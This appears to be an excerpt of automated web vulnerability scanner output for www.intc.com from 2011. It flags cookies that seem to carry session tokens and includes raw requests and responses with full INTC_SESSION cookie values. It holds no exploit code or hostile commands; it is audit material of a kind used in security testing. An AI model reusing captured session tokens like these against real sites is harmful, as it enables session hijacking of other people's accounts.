HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /eventdetail.cfm?EventID=92109 HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A48%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:48 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;